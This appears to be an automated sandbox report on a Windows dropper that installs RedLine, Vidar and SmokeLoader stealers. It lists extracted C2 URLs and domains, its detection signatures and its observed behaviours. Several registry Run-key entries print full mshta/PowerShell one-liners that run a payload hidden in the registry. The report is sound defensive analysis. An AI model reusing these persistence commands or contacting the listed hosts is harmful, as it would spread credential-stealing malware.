Analysis
-
max time kernel
118s -
max time network
155s -
platform
windows10-2004_x64 -
resource
win10v2004-en-20220113 -
submitted
11-03-2022 21:47
Static task
static1
Behavioral task
behavioral1
Sample
b3c29854b98506ff5862ee14f25ece7b219f24ed3544729740dcd2c3568e3c24.exe
Resource
win7-20220311-en
Behavioral task
behavioral2
Sample
b3c29854b98506ff5862ee14f25ece7b219f24ed3544729740dcd2c3568e3c24.exe
Resource
win10v2004-en-20220113
General
-
Target
b3c29854b98506ff5862ee14f25ece7b219f24ed3544729740dcd2c3568e3c24.exe
-
Size
3.1MB
-
MD5
f57537f2d3f3b6928530f88eeb71d22f
-
SHA1
af43ea7dd676fbc6cee400af5052de361ec5a2ae
-
SHA256
b3c29854b98506ff5862ee14f25ece7b219f24ed3544729740dcd2c3568e3c24
-
SHA512
5c31cae8e1138251969483203d6ea96349a35a2ac42597baae2233bb7e39357b637c3f6ee69b4d75d0c3a22df40275bef6cfd0ece45c87ac2e6479f6fc36955e
Malware Config
Extracted
http://62.204.41.71/cs/SkyDrive.oo
Extracted
http://62.204.41.71/cs/Fax.oo
Extracted
http://62.204.41.71/Offer/Offer.oo
Extracted
http://62.204.41.71/cs/RED.oo
Extracted
smokeloader
2020
http://ppcspb.com/upload/
http://mebbing.com/upload/
http://twcamel.com/upload/
http://howdycash.com/upload/
http://lahuertasonora.com/upload/
http://kpotiques.com/upload/
Extracted
vidar
39.4
706
https://sergeevih43.tumblr.com/
-
profile_id
706
Extracted
redline
DomAni2
flestriche.xyz:80
Extracted
vidar
50.7
937
https://ruhr.social/@sam9al
https://koyu.space/@samsa2l
-
profile_id
937
Extracted
redline
Lyla2
bonezarisor.xyz:80
-
auth_value
de2a98abc502b86b809fbc366af9256a
Signatures
-
OnlyLogger
A tiny loader that uses IPLogger to get its payload.
-
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
RedLine Payload 16 IoCs
Processes:
resource yara_rule behavioral2/memory/3928-205-0x0000000000400000-0x000000000041E000-memory.dmp family_redline behavioral2/memory/1344-221-0x00000000009A0000-0x0000000000BE5000-memory.dmp family_redline behavioral2/memory/4156-245-0x0000000000410000-0x0000000000755000-memory.dmp family_redline behavioral2/memory/1344-246-0x00000000009A0000-0x0000000000BE5000-memory.dmp family_redline behavioral2/memory/1344-243-0x00000000009A0000-0x0000000000BE5000-memory.dmp family_redline behavioral2/memory/4156-249-0x0000000000410000-0x0000000000755000-memory.dmp family_redline behavioral2/memory/4156-253-0x0000000000410000-0x0000000000755000-memory.dmp family_redline behavioral2/memory/1344-252-0x00000000009A0000-0x0000000000BE5000-memory.dmp family_redline behavioral2/memory/1344-222-0x00000000009A0000-0x0000000000BE5000-memory.dmp family_redline behavioral2/memory/1344-254-0x00000000009A0000-0x0000000000BE5000-memory.dmp family_redline behavioral2/memory/4156-258-0x0000000000410000-0x0000000000755000-memory.dmp family_redline behavioral2/memory/4156-257-0x0000000000410000-0x0000000000755000-memory.dmp family_redline behavioral2/memory/4988-300-0x0000000000610000-0x00000000008A5000-memory.dmp family_redline behavioral2/memory/4988-299-0x0000000000610000-0x00000000008A5000-memory.dmp family_redline behavioral2/memory/5532-322-0x0000000000BC0000-0x0000000000EF2000-memory.dmp family_redline behavioral2/memory/5532-320-0x0000000000BC0000-0x0000000000EF2000-memory.dmp family_redline -
SmokeLoader
Modular backdoor trojan in use since 2014.
-
suricata: ET MALWARE EXE Download Request To Wordpress Folder Likely Malicious
suricata: ET MALWARE EXE Download Request To Wordpress Folder Likely Malicious
-
suricata: ET MALWARE GCleaner Downloader Activity M5
suricata: ET MALWARE GCleaner Downloader Activity M5
-
suricata: ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile
suricata: ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile
-
suricata: ET MALWARE Vidar/Arkei Stealer Client Data Upload
suricata: ET MALWARE Vidar/Arkei Stealer Client Data Upload
-
suricata: ET MALWARE Vidar/Arkei/Megumin/Oski Stealer HTTP POST Pattern
suricata: ET MALWARE Vidar/Arkei/Megumin/Oski Stealer HTTP POST Pattern
-
suricata: ET MALWARE Win32.Raccoon Stealer - Telegram Mirror Checkin (generic)
suricata: ET MALWARE Win32.Raccoon Stealer - Telegram Mirror Checkin (generic)
-
suricata: ET MALWARE Win32.Raccoon Stealer Checkin M6
suricata: ET MALWARE Win32.Raccoon Stealer Checkin M6
-
suricata: ET MALWARE Win32/Spy.Socelars.S CnC Activity M3
suricata: ET MALWARE Win32/Spy.Socelars.S CnC Activity M3
-
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs
-
OnlyLogger Payload 1 IoCs
Processes:
resource yara_rule behavioral2/memory/4308-290-0x0000000000720000-0x0000000000764000-memory.dmp family_onlylogger -
Vidar Stealer 4 IoCs
Processes:
resource yara_rule behavioral2/memory/860-195-0x0000000004890000-0x000000000492D000-memory.dmp family_vidar behavioral2/memory/860-202-0x0000000000400000-0x000000000442B000-memory.dmp family_vidar behavioral2/memory/4140-279-0x0000000000400000-0x0000000000534000-memory.dmp family_vidar behavioral2/memory/4140-282-0x0000000002170000-0x000000000221C000-memory.dmp family_vidar -
Processes:
resource yara_rule C:\Users\Admin\AppData\Local\Temp\7zSC1CDE95D\setup_install.exe aspack_v212_v242 C:\Users\Admin\AppData\Local\Temp\7zSC1CDE95D\setup_install.exe aspack_v212_v242 C:\Users\Admin\AppData\Local\Temp\7zSC1CDE95D\libcurl.dll aspack_v212_v242 C:\Users\Admin\AppData\Local\Temp\7zSC1CDE95D\libcurl.dll aspack_v212_v242 C:\Users\Admin\AppData\Local\Temp\7zSC1CDE95D\libcurlpp.dll aspack_v212_v242 C:\Users\Admin\AppData\Local\Temp\7zSC1CDE95D\libcurlpp.dll aspack_v212_v242 C:\Users\Admin\AppData\Local\Temp\7zSC1CDE95D\libstdc++-6.dll aspack_v212_v242 C:\Users\Admin\AppData\Local\Temp\7zSC1CDE95D\libstdc++-6.dll aspack_v212_v242 -
Blocklisted process makes network request 5 IoCs
Processes:
rundll32.exepowershell.exepowershell.exepowershell.exeflow pid process 194 5212 rundll32.exe 205 5212 rundll32.exe 273 5112 powershell.exe 274 5004 powershell.exe 277 4752 powershell.exe -
Creates new service(s) 1 TTPs
-
Downloads MZ/PE file
-
Executes dropped EXE 58 IoCs
Processes:
setup_installer.exesetup_install.exesotema_4.exesotema_6.exesotema_2.exesotema_5.exesotema_7.exesotema_1.exesotema_3.exejfiag3g_gg.exesotema_7.exejfiag3g_gg.exesotema_7.exesotema_7.exesotema_7.exe3yMtczVXNtqMP89LIvk7QYbS.exeaZNvbi1qOlM2iXjLOIdGOTe7.exeRaRBFtrTBYU1Y0tjpmree9bR.exeV8mSDJYVZdnfkoOXRHQbNy2T.exeplrFbDYtIxqeEfatjuv652pe.exelp8mRbbLvvUw_NlFQIsm6Yjz.exeV3ujjI6J5Cgn10sQZ2ltQJBx.exeIF3sualFSZNKp2Oo3vzXX3_r.exeVZ7NTurPKHOFfMK1BrDT_Vg7.exeNZ3wDc8ii26yAtWGtved6YIF.execiTtNor6DDyzdbtHN54ouYOI.exemSHXhzqCbB4jwXEZq1ycglga.exeCyPSXzY1M1Ivhbr6JmTc7SY5.exeUBGIMlfT_24VXrYTNn4S0uSp.exe74CIU7hguX3Rep8AcBT0owXq.exexQJudsUslbRDEyOqmqKmWsYK.exefkozqZVOJK8nYg3uy3BmTTkU.exeRvDZTDbVe8cu7cHeyBtfVhCf.exeInstall.exe55FM6.exeH9LM9.exe2a6bacde-3795-4e9f-bf7b-f95052cca579.exeBJ4F6.exeF1BG9.exeInstall.exeA23L2.exeattrib.exebpqsuzmp.exe7z.exeRegSvc.exe7z.exe7z.exe7z.exe7z.exe7z.exe7z.exe7z.exetakeown.exe7z.exeResult_protected.exebuild.exe222.exejfvffjrpid process 3100 setup_installer.exe 3104 setup_install.exe 3832 sotema_4.exe 1184 sotema_6.exe 1640 sotema_2.exe 448 sotema_5.exe 3064 sotema_7.exe 484 sotema_1.exe 860 sotema_3.exe 1776 jfiag3g_gg.exe 3572 sotema_7.exe 1904 jfiag3g_gg.exe 1568 sotema_7.exe 3952 sotema_7.exe 3928 sotema_7.exe 1204 3yMtczVXNtqMP89LIvk7QYbS.exe 1344 aZNvbi1qOlM2iXjLOIdGOTe7.exe 448 RaRBFtrTBYU1Y0tjpmree9bR.exe 3616 V8mSDJYVZdnfkoOXRHQbNy2T.exe 4100 plrFbDYtIxqeEfatjuv652pe.exe 4140 lp8mRbbLvvUw_NlFQIsm6Yjz.exe 4148 V3ujjI6J5Cgn10sQZ2ltQJBx.exe 4156 IF3sualFSZNKp2Oo3vzXX3_r.exe 4164 VZ7NTurPKHOFfMK1BrDT_Vg7.exe 4172 NZ3wDc8ii26yAtWGtved6YIF.exe 4180 ciTtNor6DDyzdbtHN54ouYOI.exe 4300 mSHXhzqCbB4jwXEZq1ycglga.exe 4308 CyPSXzY1M1Ivhbr6JmTc7SY5.exe 4332 UBGIMlfT_24VXrYTNn4S0uSp.exe 4364 74CIU7hguX3Rep8AcBT0owXq.exe 4392 xQJudsUslbRDEyOqmqKmWsYK.exe 4404 fkozqZVOJK8nYg3uy3BmTTkU.exe 4488 RvDZTDbVe8cu7cHeyBtfVhCf.exe 2456 Install.exe 4988 55FM6.exe 5232 H9LM9.exe 5332 2a6bacde-3795-4e9f-bf7b-f95052cca579.exe 5532 BJ4F6.exe 5872 F1BG9.exe 5884 Install.exe 4740 A23L2.exe 5420 attrib.exe 2412 bpqsuzmp.exe 4384 7z.exe 1572 RegSvc.exe 2264 7z.exe 2512 7z.exe 6012 7z.exe 1632 7z.exe 6096 7z.exe 4116 7z.exe 444 7z.exe 1644 takeown.exe 4984 7z.exe 4600 Result_protected.exe 4524 build.exe 5296 222.exe 4268 jfvffjr -
Modifies Windows Firewall 1 TTPs
-
Possible privilege escalation attempt 2 IoCs
Processes:
takeown.exeicacls.exepid process 1644 takeown.exe 5124 icacls.exe -
Stops running service(s) 3 TTPs
-
Processes:
resource yara_rule C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe upx C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe upx C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe upx C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe upx C:\Users\Admin\Documents\NZ3wDc8ii26yAtWGtved6YIF.exe upx C:\Users\Admin\Documents\V3ujjI6J5Cgn10sQZ2ltQJBx.exe upx C:\Users\Admin\Documents\NZ3wDc8ii26yAtWGtved6YIF.exe upx C:\Users\Admin\Documents\V3ujjI6J5Cgn10sQZ2ltQJBx.exe upx -
Checks BIOS information in registry 2 TTPs 3 IoCs
BIOS information is often read in order to detect sandboxing environments.
Processes:
Install.exeResult_protected.exedescription ioc process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Install.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Result_protected.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion Result_protected.exe -
Checks computer location settings 2 TTPs 16 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
b3c29854b98506ff5862ee14f25ece7b219f24ed3544729740dcd2c3568e3c24.exeRaRBFtrTBYU1Y0tjpmree9bR.exebpqsuzmp.exeCyPSXzY1M1Ivhbr6JmTc7SY5.exeResult_protected.exebuild.exeaZNvbi1qOlM2iXjLOIdGOTe7.exesetup_installer.exesotema_6.execiTtNor6DDyzdbtHN54ouYOI.exemSHXhzqCbB4jwXEZq1ycglga.exeA23L2.exeInstall.exesotema_1.exeV3ujjI6J5Cgn10sQZ2ltQJBx.exeUBGIMlfT_24VXrYTNn4S0uSp.exedescription ioc process Key value queried \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\Control Panel\International\Geo\Nation b3c29854b98506ff5862ee14f25ece7b219f24ed3544729740dcd2c3568e3c24.exe Key value queried \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\Control Panel\International\Geo\Nation RaRBFtrTBYU1Y0tjpmree9bR.exe Key value queried \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\Control Panel\International\Geo\Nation bpqsuzmp.exe Key value queried \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\Control Panel\International\Geo\Nation CyPSXzY1M1Ivhbr6JmTc7SY5.exe Key value queried \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\Control Panel\International\Geo\Nation Result_protected.exe Key value queried \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\Control Panel\International\Geo\Nation build.exe Key value queried \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\Control Panel\International\Geo\Nation aZNvbi1qOlM2iXjLOIdGOTe7.exe Key value queried \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\Control Panel\International\Geo\Nation setup_installer.exe Key value queried \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\Control Panel\International\Geo\Nation sotema_6.exe Key value queried \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\Control Panel\International\Geo\Nation ciTtNor6DDyzdbtHN54ouYOI.exe Key value queried \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\Control Panel\International\Geo\Nation mSHXhzqCbB4jwXEZq1ycglga.exe Key value queried \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\Control Panel\International\Geo\Nation A23L2.exe Key value queried \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\Control Panel\International\Geo\Nation Install.exe Key value queried \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\Control Panel\International\Geo\Nation sotema_1.exe Key value queried \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\Control Panel\International\Geo\Nation V3ujjI6J5Cgn10sQZ2ltQJBx.exe Key value queried \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\Control Panel\International\Geo\Nation UBGIMlfT_24VXrYTNn4S0uSp.exe -
Loads dropped DLL 32 IoCs
Processes:
setup_install.exesotema_2.exerUNdlL32.eXeplrFbDYtIxqeEfatjuv652pe.exeregsvr32.exe7z.exe7z.exe7z.exe7z.exe7z.exe7z.exe7z.exe7z.exetakeown.exe7z.exepid process 3104 setup_install.exe 3104 setup_install.exe 3104 setup_install.exe 3104 setup_install.exe 3104 setup_install.exe 3104 setup_install.exe 1640 sotema_2.exe 3608 rUNdlL32.eXe 4100 plrFbDYtIxqeEfatjuv652pe.exe 4100 plrFbDYtIxqeEfatjuv652pe.exe 4100 plrFbDYtIxqeEfatjuv652pe.exe 4100 plrFbDYtIxqeEfatjuv652pe.exe 4100 plrFbDYtIxqeEfatjuv652pe.exe 4100 plrFbDYtIxqeEfatjuv652pe.exe 4100 plrFbDYtIxqeEfatjuv652pe.exe 4100 plrFbDYtIxqeEfatjuv652pe.exe 4100 plrFbDYtIxqeEfatjuv652pe.exe 4100 plrFbDYtIxqeEfatjuv652pe.exe 4140 4140 1804 regsvr32.exe 1804 regsvr32.exe 4384 7z.exe 2264 7z.exe 2512 7z.exe 6012 7z.exe 1632 7z.exe 6096 7z.exe 4116 7z.exe 444 7z.exe 1644 takeown.exe 4984 7z.exe -
Modifies file permissions 1 TTPs 2 IoCs
Processes:
takeown.exeicacls.exepid process 1644 takeown.exe 5124 icacls.exe -
Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
-
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Adds Run key to start application 2 TTPs 5 IoCs
Processes:
reg.exeF1BG9.exemSHXhzqCbB4jwXEZq1ycglga.exepowershell.exeRegSvc.exedescription ioc process Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\ = "mshta vbscript:(CreateObject(\"WSCrIPt.ShEll\")).Run(\"powershell [Reflection.Assembly]::Load([Microsoft.Win32.Registry]::CurrentUser.OpenSubKey('Software\\\\Microsoft\\\\SkyDrive').GetValue('Drivers')).EntryPoint.Invoke(0,@())\",0)(window.close)" reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Steam = "C:\\Users\\Admin\\AppData\\Roaming\\NVIDIA\\dllhost.exe" F1BG9.exe Set value (str) \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\mdiylwlc = "\"C:\\Users\\Admin\\bpqsuzmp.exe\"" mSHXhzqCbB4jwXEZq1ycglga.exe Set value (str) \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\FaxOptions = "mshta vbscript:(CreateObject(\"WS\"+\"C\"+\"rI\"+\"Pt.ShEll\")).Run(\"powershell [Reflection.Assembly]::Load([Microsoft.Win32.Registry]::CurrentUser.OpenSubKey('Software\\Microsoft\\Fax').GetValue('Drivers')).EntryPoint.Invoke(0,@())\",0)(window.close)" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\RegSvc = "C:\\Users\\Admin\\AppData\\Local\\Temp\\RegSvc.exe" RegSvc.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Processes:
Result_protected.exedescription ioc process Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA Result_protected.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Looks up external IP address via web service 4 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
flow ioc 57 ipinfo.io 58 ipinfo.io 182 ipinfo.io 12 ip-api.com -
Drops file in System32 directory 1 IoCs
Processes:
Install.exedescription ioc process File created C:\Windows\system32\GroupPolicy\gpt.ini Install.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 7 IoCs
Processes:
aZNvbi1qOlM2iXjLOIdGOTe7.exeIF3sualFSZNKp2Oo3vzXX3_r.exeRvDZTDbVe8cu7cHeyBtfVhCf.exe55FM6.exeH9LM9.exeBJ4F6.exeF1BG9.exepid process 1344 aZNvbi1qOlM2iXjLOIdGOTe7.exe 4156 IF3sualFSZNKp2Oo3vzXX3_r.exe 4488 RvDZTDbVe8cu7cHeyBtfVhCf.exe 4988 55FM6.exe 5232 H9LM9.exe 5532 BJ4F6.exe 5872 F1BG9.exe -
Suspicious use of SetThreadContext 2 IoCs
Processes:
sotema_7.exepowershell.exedescription pid process target process PID 3064 set thread context of 3928 3064 sotema_7.exe sotema_7.exe PID 5112 set thread context of 3836 5112 powershell.exe RegSvcs.exe -
Drops file in Windows directory 1 IoCs
Processes:
schtasks.exedescription ioc process File created C:\Windows\Tasks\booXbIzkEgfNdKvxAC.job schtasks.exe -
Launches sc.exe
Sc.exe is a Windows utlilty to control services on the system.
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Program crash 27 IoCs
Processes:
WerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exepid pid_target process target process 3332 3608 WerFault.exe rUNdlL32.eXe 3324 860 WerFault.exe sotema_3.exe 4500 4364 WerFault.exe 74CIU7hguX3Rep8AcBT0owXq.exe 5240 4308 WerFault.exe CyPSXzY1M1Ivhbr6JmTc7SY5.exe 5952 3616 WerFault.exe V8mSDJYVZdnfkoOXRHQbNy2T.exe 6068 4364 WerFault.exe 74CIU7hguX3Rep8AcBT0owXq.exe 5264 4392 WerFault.exe xQJudsUslbRDEyOqmqKmWsYK.exe 4928 4392 WerFault.exe xQJudsUslbRDEyOqmqKmWsYK.exe 5044 3616 WerFault.exe V8mSDJYVZdnfkoOXRHQbNy2T.exe 5928 4300 WerFault.exe mSHXhzqCbB4jwXEZq1ycglga.exe 5328 4308 WerFault.exe CyPSXzY1M1Ivhbr6JmTc7SY5.exe 3900 4308 WerFault.exe CyPSXzY1M1Ivhbr6JmTc7SY5.exe 3992 1204 WerFault.exe 3yMtczVXNtqMP89LIvk7QYbS.exe 4432 4164 WerFault.exe VZ7NTurPKHOFfMK1BrDT_Vg7.exe 5816 2412 WerFault.exe bpqsuzmp.exe 5724 4308 WerFault.exe CyPSXzY1M1Ivhbr6JmTc7SY5.exe 5692 4164 WerFault.exe VZ7NTurPKHOFfMK1BrDT_Vg7.exe 4452 4308 WerFault.exe CyPSXzY1M1Ivhbr6JmTc7SY5.exe 5836 4164 WerFault.exe VZ7NTurPKHOFfMK1BrDT_Vg7.exe 5636 4308 WerFault.exe CyPSXzY1M1Ivhbr6JmTc7SY5.exe 5484 4164 WerFault.exe VZ7NTurPKHOFfMK1BrDT_Vg7.exe 5648 4308 WerFault.exe CyPSXzY1M1Ivhbr6JmTc7SY5.exe 1596 4996 WerFault.exe svchost.exe 5256 4308 WerFault.exe CyPSXzY1M1Ivhbr6JmTc7SY5.exe 1892 4164 WerFault.exe VZ7NTurPKHOFfMK1BrDT_Vg7.exe 5792 4164 WerFault.exe VZ7NTurPKHOFfMK1BrDT_Vg7.exe 5160 4164 WerFault.exe VZ7NTurPKHOFfMK1BrDT_Vg7.exe -
Checks SCSI registry key(s) 3 TTPs 3 IoCs
SCSI information is often read in order to detect sandboxing environments.
Processes:
sotema_2.exedescription ioc process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI sotema_2.exe Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI sotema_2.exe Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI sotema_2.exe -
Checks processor information in registry 2 TTPs 30 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
VZ7NTurPKHOFfMK1BrDT_Vg7.exe2a6bacde-3795-4e9f-bf7b-f95052cca579.exeplrFbDYtIxqeEfatjuv652pe.exedescription ioc process Key enumerated \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor VZ7NTurPKHOFfMK1BrDT_Vg7.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\Component Information VZ7NTurPKHOFfMK1BrDT_Vg7.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Configuration Data VZ7NTurPKHOFfMK1BrDT_Vg7.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\ProcessorNameString VZ7NTurPKHOFfMK1BrDT_Vg7.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\Identifier VZ7NTurPKHOFfMK1BrDT_Vg7.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier 2a6bacde-3795-4e9f-bf7b-f95052cca579.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision VZ7NTurPKHOFfMK1BrDT_Vg7.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\Previous Update Revision VZ7NTurPKHOFfMK1BrDT_Vg7.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 VZ7NTurPKHOFfMK1BrDT_Vg7.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\Update Status VZ7NTurPKHOFfMK1BrDT_Vg7.exe Key opened \REGISTRY\MACHINE\HARDWARE\Description\System\CentralProcessor\0 2a6bacde-3795-4e9f-bf7b-f95052cca579.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 plrFbDYtIxqeEfatjuv652pe.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Status VZ7NTurPKHOFfMK1BrDT_Vg7.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Component Information VZ7NTurPKHOFfMK1BrDT_Vg7.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 VZ7NTurPKHOFfMK1BrDT_Vg7.exe Key value enumerated \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 VZ7NTurPKHOFfMK1BrDT_Vg7.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor VZ7NTurPKHOFfMK1BrDT_Vg7.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\Platform Specific Field 1 VZ7NTurPKHOFfMK1BrDT_Vg7.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1 VZ7NTurPKHOFfMK1BrDT_Vg7.exe Key value enumerated \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1 VZ7NTurPKHOFfMK1BrDT_Vg7.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Previous Update Revision VZ7NTurPKHOFfMK1BrDT_Vg7.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\Configuration Data VZ7NTurPKHOFfMK1BrDT_Vg7.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\~MHz VZ7NTurPKHOFfMK1BrDT_Vg7.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString VZ7NTurPKHOFfMK1BrDT_Vg7.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString plrFbDYtIxqeEfatjuv652pe.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz VZ7NTurPKHOFfMK1BrDT_Vg7.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier VZ7NTurPKHOFfMK1BrDT_Vg7.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\FeatureSet VZ7NTurPKHOFfMK1BrDT_Vg7.exe -
Creates scheduled task(s) 1 TTPs 3 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
Processes:
schtasks.exeschtasks.exeschtasks.exepid process 4600 schtasks.exe 220 schtasks.exe 5904 schtasks.exe -
Delays execution with timeout.exe 4 IoCs
Processes:
timeout.exetimeout.exetimeout.exetimeout.exepid process 3388 timeout.exe 6136 timeout.exe 5512 timeout.exe 4684 timeout.exe -
Enumerates processes with tasklist 1 TTPs 2 IoCs
Processes:
tasklist.exetasklist.exepid process 4376 tasklist.exe 1888 tasklist.exe -
Enumerates system info in registry 2 TTPs 2 IoCs
Processes:
Install.exedescription ioc process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS Install.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName Install.exe -
Kills process with taskkill 3 IoCs
Processes:
taskkill.exetaskkill.exetaskkill.exepid process 6024 taskkill.exe 4132 taskkill.exe 5260 taskkill.exe -
Processes:
attrib.exedescription ioc process Set value (int) \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\SOFTWARE\Microsoft\Internet Explorer\IESettingSync\SlowSettingTypesChanged = "2" attrib.exe Key created \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch attrib.exe Set value (str) \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\SOFTWARE\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" attrib.exe Key created \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\Software\Microsoft\Internet Explorer\IESettingSync attrib.exe -
Modifies registry class 1 IoCs
Processes:
sotema_1.exedescription ioc process Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ sotema_1.exe -
Processes:
